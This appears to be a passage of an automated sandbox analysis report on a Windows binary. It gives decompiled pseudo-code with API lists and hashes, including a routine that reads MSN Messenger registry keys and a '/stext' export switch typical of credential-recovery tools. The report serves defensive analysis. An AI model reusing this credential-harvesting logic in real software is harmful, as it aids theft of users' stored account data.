                                                  • Opcode Fuzzy Hash: f36eb23c2dc7077338fc74569912d0170d623695a7104f0b3b9fc9f5b09292aa
                                                  • Instruction Fuzzy Hash: D711D871800219FADB24A656DC89DEF77BCDB04309F1008B7F91572191D63D9FA886DD
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0040396C, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 67registryCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 100%
                                                  			E0040396C(void* __eflags, void* __fp0, intOrPtr _a4) {
				char _v528;
				intOrPtr _v540;
				char _v796;
				char _v1052;
				void* _v1056;
				void* _v1060;
				int _v1064;
				void* __ebx;
				void* __esi;
				void* _t21;
				long _t23;
				void** _t24;
				long _t26;
				int _t32;
				void* _t52;

				_t52 = __fp0;
				_v540 = 0x412e80;
				E004046D7( &_v528);
				_t32 = 0;
				_v1052 = 0;
				_v796 = 0;
				_v1064 = 0;
				do {
					if(_v1064 != _t32) {
						__eflags = _v1064 - 1;
						if(__eflags != 0) {
							_t21 = E0040D5DB( &_v1052, __eflags); // executed
						} else {
							_t23 = RegOpenKeyExA(0x80000001, "Software\\Microsoft\\MessengerService", _t32, 0x20019,  &_v1060); // executed
							__eflags = _t23;
							if(_t23 != 0) {
								goto L5;
							} else {
								_t24 =  &_v1060;
								goto L4;
							}
						}
					} else {
						_t26 = RegOpenKeyExA(0x80000001, "Software\\Microsoft\\MSNMessenger", _t32, 0x20019,  &_v1056); // executed
						if(_t26 != 0) {
							L5:
							_t21 = 0;
						} else {
							_t24 =  &_v1056;
							L4:
							_t21 = E0040D4A6( &_v1052, _t24);
						}
					}
					_t32 = 0;
					if(_t21 != 0) {
						E004038CF(_t52, _a4,  &_v1052);
					}
					_v1064 = _v1064 + 1;
				} while (_v1064 <= 2);
				return E004047F1( &_v528);
			}


















                                                  0x0040396c
                                                  0x00403982
                                                  0x0040398d
                                                  0x00403998
                                                  0x0040399a
                                                  0x0040399e
                                                  0x004039a5
                                                  0x004039ae
                                                  0x004039b2
                                                  0x004039df
                                                  0x004039e4
                                                  0x00403a07
                                                  0x004039e6
                                                  0x004039f7
                                                  0x004039f9
                                                  0x004039fb
                                                  0x00000000
                                                  0x004039fd
                                                  0x004039fd
                                                  0x00000000
                                                  0x004039fd
                                                  0x004039fb
                                                  0x004039b4
                                                  0x004039c5
                                                  0x004039c9
                                                  0x004039db
                                                  0x004039db
                                                  0x004039cb
                                                  0x004039cb
                                                  0x004039cf
                                                  0x004039d4
                                                  0x004039d4
                                                  0x004039c9
                                                  0x00403a0c
                                                  0x00403a10
                                                  0x00403a1a
                                                  0x00403a1a
                                                  0x00403a1f
                                                  0x00403a23
                                                  0x00403a3c

                                                  APIs
                                                    • Part of subcall function 004046D7: strcpy.MSVCRT ref: 00404726
                                                  • RegOpenKeyExA.KERNELBASE(80000001,Software\Microsoft\MSNMessenger,00000000,00020019,?), ref: 004039C5
                                                    • Part of subcall function 0040D5DB: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,?,000000FF,00000000,00000000,?,?,00000001), ref: 0040D6A7
                                                    • Part of subcall function 0040D5DB: strlen.MSVCRT ref: 0040D6B7
                                                    • Part of subcall function 0040D5DB: strcpy.MSVCRT(?,?), ref: 0040D6C8
                                                    • Part of subcall function 0040D5DB: LocalFree.KERNEL32(?), ref: 0040D6D5
                                                  • RegOpenKeyExA.KERNELBASE(80000001,Software\Microsoft\MessengerService,00000000,00020019,?), ref: 004039F7
                                                  Strings
                                                  • Software\Microsoft\MSNMessenger, xrefs: 004039BF
                                                  • Software\Microsoft\MessengerService, xrefs: 004039F1
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.240465103.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.240481478.0000000000418000.00000040.00000001.sdmp Download File
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Openstrcpy$ByteCharFreeLocalMultiWidestrlen
                                                  • String ID: Software\Microsoft\MSNMessenger$Software\Microsoft\MessengerService
                                                  • API String ID: 1910562259-1741179510
                                                  • Opcode ID: a042053f0881545de1053e7963e322542f87d6f2c27a3a690180a3307b8871c0
                                                  • Instruction ID: e1373b66f94ab8684edf5be4eb08dc620599410c0cc400d8dd4f2e2a864aae35
                                                  • Opcode Fuzzy Hash: a042053f0881545de1053e7963e322542f87d6f2c27a3a690180a3307b8871c0
                                                  • Instruction Fuzzy Hash: 4F11F6B1608345AEC320DF5188819ABBBEC9B84355F50893FF584A2081D338DA09CAAB
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0040ED0B, Relevance: 6.1, APIs: 4, Instructions: 55COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 100%
                                                  			E0040ED0B(unsigned int _a4, CHAR* _a8, CHAR* _a12) {
				struct HRSRC__* _t12;
				void* _t16;
				void* _t17;
				signed int _t26;
				signed int _t29;
				signed int _t33;
				struct HRSRC__* _t35;
				signed int _t36;

				_t12 = FindResourceA(_a4, _a12, _a8); // executed
				_t35 = _t12;
				if(_t35 != 0) {
					_t33 = SizeofResource(_a4, _t35);
					if(_t33 > 0) {
						_t16 = LoadResource(_a4, _t35);
						if(_t16 != 0) {
							_t17 = LockResource(_t16);
							if(_t17 != 0) {
								_a4 = _t33;
								_t29 = _t33 * _t33;
								_t36 = 0;
								_t7 =  &_a4;
								 *_t7 = _a4 >> 2;
								if( *_t7 != 0) {
									do {
										_t26 =  *(_t17 + _t36 * 4) * _t36 * _t33 * 0x00000011 ^  *(_t17 + _t36 * 4) + _t29;
										_t36 = _t36 + 1;
										_t29 = _t26;
									} while (_t36 < _a4);
								}
								 *0x417110 =  *0x417110 + _t29 ^ _t33;
							}
						}
					}
				}
				return 1;
			}











                                                  0x0040ed18
                                                  0x0040ed1e
                                                  0x0040ed22
                                                  0x0040ed2f
                                                  0x0040ed33
                                                  0x0040ed39
                                                  0x0040ed41
                                                  0x0040ed44
                                                  0x0040ed4c
                                                  0x0040ed50
                                                  0x0040ed53
                                                  0x0040ed56
                                                  0x0040ed58
                                                  0x0040ed58
                                                  0x0040ed5c
                                                  0x0040ed5f
                                                  0x0040ed6f
                                                  0x0040ed71
                                                  0x0040ed75
                                                  0x0040ed75
                                                  0x0040ed79
                                                  0x0040ed83
                                                  0x0040ed83
                                                  0x0040ed4c
                                                  0x0040ed41
                                                  0x0040ed88
                                                  0x0040ed8e

                                                  APIs
                                                  • FindResourceA.KERNEL32(?,?,?), ref: 0040ED18
                                                  • SizeofResource.KERNEL32(?,00000000), ref: 0040ED29
                                                  • LoadResource.KERNEL32(?,00000000), ref: 0040ED39
                                                  • LockResource.KERNEL32(00000000), ref: 0040ED44
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.240465103.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.240481478.0000000000418000.00000040.00000001.sdmp Download File
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Resource$FindLoadLockSizeof
                                                  • String ID:
                                                  • API String ID: 3473537107-0
                                                  • Opcode ID: 4124c9c16d571b3a6a6dda8a6002e2ff58418d98f6681f6753ff1314487d049b
                                                  • Instruction ID: 6bf1e5af94a697a74b0619517749427008784a8e56cd275cc50dd62f01ccc87b
                                                  • Opcode Fuzzy Hash: 4124c9c16d571b3a6a6dda8a6002e2ff58418d98f6681f6753ff1314487d049b
                                                  • Instruction Fuzzy Hash: 450104367002126BCB185F66CD4599B7FAAFF852903488536AD09DA360D770C921C688
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0040EA72, Relevance: 6.1, APIs: 4, Instructions: 52COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 95%
                                                  			E0040EA72(void* __ecx, intOrPtr* __edi, void* __eflags, intOrPtr _a4, CHAR* _a8, CHAR* _a12, intOrPtr _a16, CHAR* _a20) {
				void _v8199;
				char _v8200;
				void* __ebx;
				int _t23;
				CHAR* _t31;

				E004118A0(0x2004, __ecx);
				_v8200 = 0;
				if(_a4 == 0) {
					memset( &_v8199, 0, 0x2000);
					GetPrivateProfileStringA(_a8, _a12, 0x412466,  &_v8200, 0x2000, _a20); // executed
					_t23 = E004067DC( &_v8200, __edi, _a16);
				} else {
					memset( &_v8199, 0, 0x2000);
					_t31 =  &_v8200;
					E00406763(_t31, _a16,  *__edi);
					_t23 = WritePrivateProfileStringA(_a8, _a12, _t31, _a20);
				}
				return _t23;
			}








                                                  0x0040ea7a
                                                  0x0040ea85
                                                  0x0040ea8b
                                                  0x0040ead5
                                                  0x0040eaf3
                                                  0x0040eb03
                                                  0x0040ea8d
                                                  0x0040ea9a
                                                  0x0040eaa1
                                                  0x0040eaaa
                                                  0x0040eabe
                                                  0x0040eabe
                                                  0x0040eb0d

                                                  APIs
                                                  • memset.MSVCRT ref: 0040EA9A
                                                    • Part of subcall function 00406763: sprintf.MSVCRT ref: 0040679B
                                                    • Part of subcall function 00406763: memcpy.MSVCRT ref: 004067AE
                                                  • WritePrivateProfileStringA.KERNEL32(?,?,?,?), ref: 0040EABE
                                                  • memset.MSVCRT ref: 0040EAD5
                                                  • GetPrivateProfileStringA.KERNEL32(?,?,Function_00012466,?,00002000,?), ref: 0040EAF3
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.240465103.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.240481478.0000000000418000.00000040.00000001.sdmp Download File
                                                  Yara matches
                                                  Similarity
                                                  • API ID: PrivateProfileStringmemset$Writememcpysprintf
                                                  • String ID:
                                                  • API String ID: 3143880245-0
                                                  • Opcode ID: 55a900beb3324ae435e234628281be75478a67a5b39370e1d0f1c50bd7ccf1f7
                                                  • Instruction ID: dd976746f5256500085d4a95e5c89bc7782f2e7a6919953fe2ebae93c0a04965
                                                  • Opcode Fuzzy Hash: 55a900beb3324ae435e234628281be75478a67a5b39370e1d0f1c50bd7ccf1f7
                                                  • Instruction Fuzzy Hash: 6F01A172800219BFEF12AF51DC89DDB3B79EF04344F0044A6B609A2062D6359A64CB68
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0040B785, Relevance: 6.1, APIs: 4, Instructions: 51windowCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 96%
                                                  			E0040B785(intOrPtr __eax, intOrPtr* __ebx) {
				void* __edi;
				void* __esi;
				intOrPtr _t14;
				intOrPtr _t15;
				void* _t16;
				void* _t17;
				struct HICON__* _t19;
				intOrPtr* _t23;
				void* _t25;

				_t23 = __ebx;
				_t14 = __eax;
				 *((intOrPtr*)(__ebx + 0x124)) = 0;
				 *__ebx = 0x41356c;
				 *((intOrPtr*)(__ebx + 0x258)) = 0;
				_push(0x14);
				 *((intOrPtr*)(__ebx + 0x374)) = 0;
				L004115D0();
				if(__eax == 0) {
					_t14 = 0;
					__eflags = 0;
				} else {
					 *0x417114 = __eax;
				}
				 *((intOrPtr*)(_t23 + 0x36c)) = _t14;
				L004115D0(); // executed
				_t32 = _t14;
				_t25 = 0xf38;
				if(_t14 == 0) {
					_t15 = 0;
					__eflags = 0;
				} else {
					_t15 = E00404016(_t14, _t32);
				}
				 *((intOrPtr*)(_t23 + 0x370)) = _t15;
				 *((intOrPtr*)(_t23 + 0x378)) = 0;
				 *((intOrPtr*)(_t23 + 0x260)) = 0;
				 *((intOrPtr*)(_t23 + 0x25c)) = 0;
				 *((intOrPtr*)(_t23 + 0x154)) = 0;
				_t16 =  *(_t23 + 0x258);
				if(_t16 != 0) {
					DeleteObject(_t16);
					 *(_t23 + 0x258) = 0;
				}
				_t17 = E00406252(); // executed
				 *(_t23 + 0x258) = _t17;
				E00401000(_t25, _t23 + 0x158, 0x413480);
				_t19 = LoadIconA( *0x416b94, 0x65); // executed
				E004017A4(_t23, _t19);
				return _t23;
			}












                                                  0x0040b785
                                                  0x0040b785
                                                  0x0040b789
                                                  0x0040b78f
                                                  0x0040b795
                                                  0x0040b79b
                                                  0x0040b79d
                                                  0x0040b7a3
                                                  0x0040b7ab
                                                  0x0040b7b4
                                                  0x0040b7b4
                                                  0x0040b7ad
                                                  0x0040b7ad
                                                  0x0040b7ad
                                                  0x0040b7bb
                                                  0x0040b7c1
                                                  0x0040b7c6
                                                  0x0040b7c8
                                                  0x0040b7c9
                                                  0x0040b7d4
                                                  0x0040b7d4
                                                  0x0040b7cb
                                                  0x0040b7cd
                                                  0x0040b7cd
                                                  0x0040b7d6
                                                  0x0040b7dc
                                                  0x0040b7e2
                                                  0x0040b7e8
                                                  0x0040b7ee
                                                  0x0040b7f4
                                                  0x0040b7fc
                                                  0x0040b7ff
                                                  0x0040b805
                                                  0x0040b805
                                                  0x0040b80b
                                                  0x0040b81b
                                                  0x0040b821
                                                  0x0040b82e
                                                  0x0040b837
                                                  0x0040b840

                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.240465103.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.240481478.0000000000418000.00000040.00000001.sdmp Download File
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ??2@$DeleteIconLoadObject
                                                  • String ID:
                                                  • API String ID: 1986663749-0
                                                  • Opcode ID: 0423a71d4927b18fd553b5e50ae37bff09cbbc21581d25ca9f1141fabe86d1e7
                                                  • Instruction ID: 38da8263615bef274e7c21802c355ecfe582676222a25676d72b73c1d19d8401
                                                  • Opcode Fuzzy Hash: 0423a71d4927b18fd553b5e50ae37bff09cbbc21581d25ca9f1141fabe86d1e7
                                                  • Instruction Fuzzy Hash: 8C1151B09056509BCF519F259C887C53BA4EB84B41F1804BBFD08EF3A6DBB845418BAC
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00411932, Relevance: 6.0, APIs: 4, Instructions: 25COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 72%
                                                  			E00411932() {
				intOrPtr _t1;
				intOrPtr _t2;
				intOrPtr _t3;
				intOrPtr _t4;

				_t1 =  *0x417528;
				if(_t1 != 0) {
					_push(_t1);
					L004115D6();
				}
				_t2 =  *0x417530;
				if(_t2 != 0) {
					_push(_t2); // executed
					L004115D6(); // executed
				}
				_t3 =  *0x41752c;
				if(_t3 != 0) {
					_push(_t3);
					L004115D6();
				}
				_t4 =  *0x417534;
				if(_t4 != 0) {
					_push(_t4); // executed
					L004115D6(); // executed
					return _t4;
				}
				return _t4;
			}







                                                  0x00411932
                                                  0x00411939
                                                  0x0041193b
                                                  0x0041193c
                                                  0x00411941
                                                  0x00411942
                                                  0x00411949
                                                  0x0041194b
                                                  0x0041194c
                                                  0x00411951
                                                  0x00411952
                                                  0x00411959
                                                  0x0041195b
                                                  0x0041195c
                                                  0x00411961
                                                  0x00411962
                                                  0x00411969
                                                  0x0041196b
                                                  0x0041196c
                                                  0x00000000
                                                  0x00411971
                                                  0x00411972

                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.240465103.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.240481478.0000000000418000.00000040.00000001.sdmp Download File
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ??3@
                                                  • String ID:
                                                  • API String ID: 613200358-0
                                                  • Opcode ID: 91c60f5c1f6e7dd8e91e3fe6036ebb2df298eb5d5c74a2e7dfa5f35f51adb5a0
                                                  • Instruction ID: d6dbe33ea61767d3fff50222484a645f5af73bc96bc71b3580d13e53834dfd00
                                                  • Opcode Fuzzy Hash: 91c60f5c1f6e7dd8e91e3fe6036ebb2df298eb5d5c74a2e7dfa5f35f51adb5a0
                                                  • Instruction Fuzzy Hash: E0E012B0319201A68E20AB7BBD40A9323AE2A44310354806FF206D2AB1DE38D8C0C63C
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0040787D, Relevance: 5.0, APIs: 4, Instructions: 36COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 78%
                                                  			E0040787D() {
				void* _t13;
				signed int _t16;
				signed int _t18;
				signed int _t27;
				signed int _t29;
				intOrPtr _t33;

				_t33 =  *0x417540;
				if(_t33 == 0) {
					_push(0x8000);
					 *0x417540 = 0x8000;
					 *0x417544 = 0x100;
					 *0x417548 = 0x1000; // executed
					L004115D0(); // executed
					 *0x417528 = 0x8000;
					_t27 = 4;
					_t16 =  *0x417544 * _t27;
					_push( ~(0 | _t33 > 0x00000000) | _t16);
					L004115D0();
					 *0x417530 = _t16;
					_t29 = 4;
					_t18 =  *0x417544 * _t29;
					_push( ~(0 | _t33 > 0x00000000) | _t18);
					L004115D0();
					_push( *0x417548);
					 *0x417534 = _t18; // executed
					L004115D0(); // executed
					 *0x41752c = _t18;
					return _t18;
				}
				return _t13;
			}









                                                  0x0040787d
                                                  0x00407884
                                                  0x0040788b
                                                  0x0040788c
                                                  0x00407891
                                                  0x0040789b
                                                  0x004078a5
                                                  0x004078aa
                                                  0x004078b8
                                                  0x004078b9
                                                  0x004078c2
                                                  0x004078c3
                                                  0x004078c8
                                                  0x004078d6
                                                  0x004078d7
                                                  0x004078e0
                                                  0x004078e1
                                                  0x004078e6
                                                  0x004078ec
                                                  0x004078f1
                                                  0x004078f9
                                                  0x00000000
                                                  0x004078f9
                                                  0x004078fe

                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.240465103.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.240481478.0000000000418000.00000040.00000001.sdmp Download File
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ??2@
                                                  • String ID:
                                                  • API String ID: 1033339047-0
                                                  • Opcode ID: d8185543564e7c8b2bd4b8c3e8d173cfd25ed724cb8acf65200bb5964d18c7b3
                                                  • Instruction ID: 98653883aa4781a1616f5f21c4e99a92f1a36013e955d8e4b32a99e29624f39b
                                                  • Opcode Fuzzy Hash: d8185543564e7c8b2bd4b8c3e8d173cfd25ed724cb8acf65200bb5964d18c7b3
                                                  • Instruction Fuzzy Hash: E6F012B1589210BFDB549B39ED067A53AB2A748394F10917EE207CA6F5FB7454408B4C
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 004060FA, Relevance: 3.8, APIs: 3, Instructions: 38COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 100%
                                                  			E004060FA(signed int* __eax, void* __edx, void** __edi, signed int _a4, intOrPtr _a8) {
				void* _t8;
				void* _t13;
				signed int _t16;
				void** _t21;
				signed int _t22;

				_t21 = __edi;
				_t22 =  *__eax;
				if(__edx < _t22) {
					return 0;
				} else {
					_t13 =  *__edi;
					do {
						 *__eax =  *__eax + _a8;
						_t16 =  *__eax;
					} while (__edx >= _t16);
					_t8 = malloc(_t16 * _a4); // executed
					 *__edi = _t8;
					if(_t22 > 0) {
						if(_t8 != 0) {
							memcpy(_t8, _t13, _t22 * _a4);
						}
						free(_t13);
					}
					return 0 |  *_t21 != 0x00000000;
				}
			}








                                                  0x004060fa
                                                  0x004060fb
                                                  0x004060ff
                                                  0x0040614a
                                                  0x00406101
                                                  0x00406102
                                                  0x00406104
                                                  0x00406108
                                                  0x0040610a
                                                  0x0040610c
                                                  0x00406116
                                                  0x0040611e
                                                  0x00406120
                                                  0x00406124
                                                  0x0040612e
                                                  0x00406133
                                                  0x00406137
                                                  0x0040613c
                                                  0x00406146
                                                  0x00406146

                                                  APIs
                                                  • malloc.MSVCRT ref: 00406116
                                                  • memcpy.MSVCRT ref: 0040612E
                                                  • free.MSVCRT(00000000,00000000,74B04DE0,00406B49,00000001,?,00000000,74B04DE0,00406D88,00000000,?,?), ref: 00406137
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.240465103.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.240481478.0000000000418000.00000040.00000001.sdmp Download File
                                                  Yara matches
                                                  Similarity
                                                  • API ID: freemallocmemcpy
                                                  • String ID:
                                                  • API String ID: 3056473165-0
                                                  • Opcode ID: c16869745dd056c7ef743fb7ed117d9ff76353dfe782dc17f391ee5363500ee0
                                                  • Instruction ID: d153bd7f556b54fa1e8e463c7175d954409fdcf13f6af5892cc53e784d19f72a
                                                  • Opcode Fuzzy Hash: c16869745dd056c7ef743fb7ed117d9ff76353dfe782dc17f391ee5363500ee0
                                                  • Instruction Fuzzy Hash: 9DF0E9726052219FC7089F79B98145BB3DDAF84324B11482FF546D7292D7389C50C798
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0040B8D7, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 74COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 93%
                                                  			E0040B8D7(void* __edi, void* __eflags) {
				void* __esi;
				signed int _t24;
				intOrPtr _t31;
				intOrPtr _t38;
				void* _t42;
				void* _t45;
				void* _t49;
				void* _t51;
				intOrPtr _t52;

				_t54 = __eflags;
				_t49 = __edi;
				_t38 = 0;
				E004023D4( *((intOrPtr*)(__edi + 0x370)), __eflags, 0, 0);
				 *((intOrPtr*)(__edi + 0x108)) = 0;
				E00401E8B(_t54,  *((intOrPtr*)(__edi + 0x370)) + 0xb20); // executed
				_t24 =  *((intOrPtr*)(__edi + 0x37c));
				if( *((intOrPtr*)(_t24 + 0x30)) <= 0) {
					_t51 = 0x412466;
				} else {
					if( *((intOrPtr*)(_t24 + 0x1c)) <= 0) {
						_t45 = 0;
						__eflags = 0;
					} else {
						_t45 =  *((intOrPtr*)( *((intOrPtr*)(_t24 + 0xc)))) +  *((intOrPtr*)(_t24 + 0x10));
					}
					_t51 = _t45;
				}
				_push(_t51);
				_push("/stext");
				L004115B2();
				if(_t24 != 0) {
					_t52 = E0040B841(_t24, _t51);
					__eflags = _t52 - _t38;
					if(_t52 <= _t38) {
						goto L15;
					}
					goto L9;
				} else {
					_t52 = 1;
					L9:
					E0040AF17(_t49, _t38); // executed
					E0040A5AC(_t49);
					_t31 =  *((intOrPtr*)(_t49 + 0x37c));
					if( *((intOrPtr*)(_t31 + 0x30)) <= 1) {
						_t42 = 0x412466;
					} else {
						_t59 =  *((intOrPtr*)(_t31 + 0x1c)) - 1;
						if( *((intOrPtr*)(_t31 + 0x1c)) <= 1) {
							_t42 = 0;
						} else {
							_t42 =  *((intOrPtr*)( *((intOrPtr*)(_t31 + 0xc)) + 4)) +  *((intOrPtr*)(_t31 + 0x10));
						}
					}
					 *((intOrPtr*)( *((intOrPtr*)(_t49 + 0x370)) + 0x1bc)) =  *((intOrPtr*)( *((intOrPtr*)(_t49 + 0x36c)) + 0xc));
					E00409B32( *((intOrPtr*)(_t49 + 0x370)),  *((intOrPtr*)(_t49 + 0x370)), _t49, _t59, _t42, _t52); // executed
					_t38 = 1;
					E0040B0C2(_t49);
					L15:
					return _t38;
				}
			}












                                                  0x0040b8d7
                                                  0x0040b8d7
                                                  0x0040b8e0
                                                  0x0040b8e4
                                                  0x0040b8f5
                                                  0x0040b8fb
                                                  0x0040b900
                                                  0x0040b909
                                                  0x0040b920
                                                  0x0040b90b
                                                  0x0040b90e
                                                  0x0040b91a
                                                  0x0040b91a
                                                  0x0040b910
                                                  0x0040b915
                                                  0x0040b915
                                                  0x0040b91c
                                                  0x0040b91c
                                                  0x0040b925
                                                  0x0040b926
                                                  0x0040b92b
                                                  0x0040b934
                                                  0x0040b940
                                                  0x0040b942
                                                  0x0040b944
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x0040b936
                                                  0x0040b938
                                                  0x0040b946
                                                  0x0040b949
                                                  0x0040b950
                                                  0x0040b955
                                                  0x0040b95f
                                                  0x0040b976
                                                  0x0040b961
                                                  0x0040b961
                                                  0x0040b965
                                                  0x0040b972
                                                  0x0040b967
                                                  0x0040b96d
                                                  0x0040b96d
                                                  0x0040b965
                                                  0x0040b98b
                                                  0x0040b998
                                                  0x0040b9a1
                                                  0x0040b9a2
                                                  0x0040b9a8
                                                  0x0040b9ac
                                                  0x0040b9ac

                                                  APIs
                                                    • Part of subcall function 00401E8B: memset.MSVCRT ref: 00401EAD
                                                    • Part of subcall function 00401E8B: strlen.MSVCRT ref: 00401EC6
                                                    • Part of subcall function 00401E8B: strlen.MSVCRT ref: 00401ED4
                                                    • Part of subcall function 00401E8B: strlen.MSVCRT ref: 00401F1A
                                                    • Part of subcall function 00401E8B: strlen.MSVCRT ref: 00401F28
                                                  • _stricmp.MSVCRT(/stext,00412466,?,00000000,00000000,?,?,?,0040BAC6), ref: 0040B92B
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.240465103.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.240481478.0000000000418000.00000040.00000001.sdmp Download File
                                                  Yara matches
                                                  Similarity
                                                  • API ID: strlen$_stricmpmemset
                                                  • String ID: /stext
                                                  • API String ID: 3575250601-3817206916
                                                  • Opcode ID: ba91a629983a4474272755d1190fe0abc20447847f5b5280d74d03c064ef9f45
                                                  • Instruction ID: 7d69c3f5364ef88ad9e24340ba35af89a1d621815374fdce2acadc9eabf4c73c
                                                  • Opcode Fuzzy Hash: ba91a629983a4474272755d1190fe0abc20447847f5b5280d74d03c064ef9f45
                                                  • Instruction Fuzzy Hash: 45213EB1614111DFC35C9B29C881D65B3A8FB45314B1582BFF91AA7292C738ED518BCD
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00406252, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 14COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 100%
                                                  			E00406252() {
				struct tagLOGFONTA _v64;
				struct HFONT__* _t6;

				E00406191( &_v64, "Arial", 0xe, 0);
				_t6 = CreateFontIndirectA( &_v64); // executed
				return _t6;
			}





                                                  0x00406264
                                                  0x00406270
                                                  0x00406277

                                                  APIs
                                                    • Part of subcall function 00406191: memset.MSVCRT ref: 0040619B
                                                    • Part of subcall function 00406191: strcpy.MSVCRT(?,00000000,?,00000000,0000003C,00000000,?,00406269,Arial,0000000E,00000000), ref: 004061DB
                                                  • CreateFontIndirectA.GDI32(?), ref: 00406270
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.240465103.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.240481478.0000000000418000.00000040.00000001.sdmp Download File
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CreateFontIndirectmemsetstrcpy
                                                  • String ID: Arial
                                                  • API String ID: 3275230829-493054409
                                                  • Opcode ID: 7d2b7ca13242ecb95fba35a4d161325a02a1357963518cd5c2775a7b681f11d7
                                                  • Instruction ID: 9d865b7f43533acfebf3b00b6ce8d331e43bccbbf35dbaed0a6f3a0435680c9f
                                                  • Opcode Fuzzy Hash: 7d2b7ca13242ecb95fba35a4d161325a02a1357963518cd5c2775a7b681f11d7
                                                  • Instruction Fuzzy Hash: B3D0C970E4020D76E600BAA0FD07B897BAC5B00605F508421BA41F51E2FAE8A15586A9
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 004047A0, Relevance: 3.0, APIs: 2, Instructions: 24libraryloaderCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 100%
                                                  			E004047A0(CHAR* __esi, void* __eflags) {
				struct HINSTANCE__* _t8;
				char _t12;
				char* _t15;
				CHAR* _t17;

				_t17 = __esi;
				E004047F1(__esi);
				_t8 = LoadLibraryA(__esi); // executed
				__esi[0x200] = _t8;
				if(_t8 != 0) {
					_t12 = GetProcAddress(_t8,  &(__esi[0xff]));
					__esi[0x208] = _t12;
					if(_t12 != 0) {
						__esi[0x204] = 1;
					}
				}
				_t15 =  &(_t17[0x204]);
				if( *_t15 == 0) {
					E004047F1(_t17);
				}
				return  *_t15;
			}







                                                  0x004047a0
                                                  0x004047a2
                                                  0x004047a8
                                                  0x004047b0
                                                  0x004047b6
                                                  0x004047c0
                                                  0x004047c8
                                                  0x004047ce
                                                  0x004047d0
                                                  0x004047d0
                                                  0x004047ce
                                                  0x004047db
                                                  0x004047e4
                                                  0x004047e8
                                                  0x004047e8
                                                  0x004047f0

                                                  APIs
                                                    • Part of subcall function 004047F1: FreeLibrary.KERNELBASE(?,?), ref: 00404806
                                                  • LoadLibraryA.KERNELBASE(?,0040D60E,80000001,75D6F420), ref: 004047A8
                                                  • GetProcAddress.KERNEL32(00000000,?), ref: 004047C0
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.240465103.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.240481478.0000000000418000.00000040.00000001.sdmp Download File
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Library$AddressFreeLoadProc
                                                  • String ID:
                                                  • API String ID: 145871493-0
                                                  • Opcode ID: cbabdfec5215e458202f737861f40a15f802b817f3ec498c61102a043c0cc1ea
                                                  • Instruction ID: bd92e302f737a6b7e7c2aa8ed3bd721d1bcdfa8038008227cdd2def65d6b9a1b
                                                  • Opcode Fuzzy Hash: cbabdfec5215e458202f737861f40a15f802b817f3ec498c61102a043c0cc1ea
                                                  • Instruction Fuzzy Hash: F1F039B02007028BD7209F39D84879B77E8BF85700F00853EF266E3281EB78A951CB28
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0040EB0E, Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetPrivateProfileIntA.KERNEL32 ref: 0040EB35
                                                    • Part of subcall function 0040EA26: memset.MSVCRT ref: 0040EA44
